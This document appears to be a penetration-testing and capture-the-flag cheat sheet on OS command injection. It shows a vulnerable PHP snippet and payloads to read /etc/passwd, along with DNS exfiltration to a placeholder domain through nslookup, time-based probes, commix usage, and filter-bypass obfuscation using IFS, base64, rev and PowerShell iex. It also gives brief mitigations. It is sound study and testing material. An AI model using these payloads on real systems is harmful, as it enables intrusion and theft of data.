Command injection

commandinjections command_injection oscommandinjection owasptop10 picklerick ignite chillhack sau celestial busqueda php_command_injection command_injection_filter_bypass command_injection command_simple command_blind_output_redirection

A command injection occurs when a developer uses the user input in system commands without proper sanitization/measures.

For instance, a PHP website on Linux might use grep, sed, or other utilities instead of PHP functions for some operations:

$search = $_GET['q'];
$res = system("grep \"$search\" content/");
echo "<pre>$res</pre>";

With the following payload for q: " -V; cat /etc/passwd #, the command executed will be as follows, allowing us to steal /etc/passwd

grep "" -V; cat /etc/passwd # content/
grep "" -V || cat /etc/passwd || content/ # alternative

There are two kinds of command injections

  • Regular/in-band: same channel to attack and gather results
  • Blind/out-band: different channels to attack and gather results
    • Using redirections/flags, create a URL-accessible output file
[...] cat /etc/passwd > /var/www/html/output.txt [...]
    • Using nslookup to perform a DNS exfiltration
[...] nslookup `whoami`.domain.com [...]
    • Using commands such as sleep to perform a time-based attack
[...] true && sleep 5 [...]

Basic Overview

Assuming we have a list of vulnerable elements such as forms that may be vulnerable, we can try common payloads:

  • ; β€” %3B β€” run two commands
  • && β€” %26%26 β€” executed if the previous ones succeed
  • || β€” %7C%7C β€” executed if the previous ones failed
  • & β€” %26 β€” run two commands (background previous)
  • | β€” %7C β€” run two commands (pipe previous one)
  • `` β€” %60%60 β€” execute a command in another command
  • $() β€” %24%28%29 β€” execute a command in another command
  • \n or \r\n β€” %0A or %0d%0a β€” run two commands
  • !x β€” bash-specific β€” replaced with a command in the history
  • {ls,-la} β€” bash-specific β€” replaced with ls -la

Always try to inject bit by bit using a boolean-based approach.

Tools πŸ“š

  • Commix (4.6k ⭐) can detect and automatically exploit applications. It was coded in a similar way that SQLMap for SQL injections.
$ pipx install git+https://github.com/commixproject/commix.git
$ commix -u 'URL' -d 'xxx=*' # POST request, xxx vulnerable

$ pipx install git+https://github.com/QuentinRa/onectf.git
$ onectf request -u 'URL' -v -X POST -p 'xxx' -i 'x;id'
$ onectf request -u 'URL' -v -X POST -p 'xxx' -i 'x;ls<tab>/'
$ onectf request -u 'URL' -v -X POST -p 'xxx' -i 'x;ls /' --tamper aliases,space2tab

πŸ“š The wordlists special-chars.txt can be handy.

Bypass filters

bypass_bash_restrictions

Character Filtering

chillhack

Bypass space character filtering.

  • Try using tabs (%09)
  • Try using variables (${IFS})
  • Try using brace expansion ({ls,-la}) -- bash
  • ...

Bypass braces/star character filtering.

  • You can replace ls${IFS}/ with ls$IFS""/
  • You can replace ls${IFS}/ with ls$IFS\/
  • You can replace cat${IFS}* with cat$IFS$(ls)

Bypass slash character filtering.

  • Try using variables (${PATH:0:1}) -- may not be set
  • Try using variables (${HOME:0:1}) -- may not be set
  • Try using variables (${PWD:0:1})
  • ...

➑️ See also: printenv, env, set, export to list environment variables.

Bypass using obfuscation

Remember that such payloads may contain filtered characters. See also tools such as Bashfuscator.

$ $(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$ $(a="WhOaMi";printf %s "${a,,}")
$ # using base64
$ base64 <<< whoami
d2hvYW1pCg==
$ bash<<<$(base64 -d<<<d2hvYW1pCg==) # whoami
$ # using UTF-16 and base64
$ echo -n whoami | iconv -f utf-8 -t utf-16le | base64

Command Filtering

chillhack powershell_basic_jail

Add a pair of quotes/double quotes anywhere within the command

# Available on Linux, Windows (PowerShell)
$ w'ho'ami ; w""hoam''i
  • Put \\ or $@ anywhere within the command
# Available on Linux
$ w\hoami ; who$@ami
  • Put ^ anywhere within the command
# Available on Windows (CMD)
CMD> who^am^i
  • Reverse commands
$ $(rev<<<'imaohw')
PS> iex "$('imaohw'[-1..-20] -join '')"
  • Filters may have been applied only once
PS> cat # It doesn't work.
PS> ccatat # It works!
  • Use variables to split the command
PS> $a="l"; $b="s" ; & $a$b

Additional Notes

Refer to injection if you need to inject something in the arguments of a custom script.

Mailtrail v0.53

sau

POC (python script) (0.04k ⭐).

$ python3 exploit.py listener_ip listener_port URL

PowerShell Command Injection

powershell_command_injection powershell_basic_jail

Reminder of useful payloads: $(whoami), ; whoami, $(Get-ChildItem Env:), $(command|Out-string), | powershell command...

Mitigation πŸ›‘οΈ

  • πŸͺ² Avoid using uncontrolled input in system commands. Always validate and filter user input.

  • πŸ”« Use the web engine functions instead of system functions

  • πŸ“š Use additional tools such as a WAF, etc.

As always, we can configure the server to block some functions or disable access to folders outside the application directories.

πŸ‘» To-do πŸ‘»

Stuff that I found, but never read/used yet.

  • Windows Slash ($env:HOMEPATH[0])
  • Direct access to a program in a jail?
  • "'`{ls,-a}`'" (error but execute)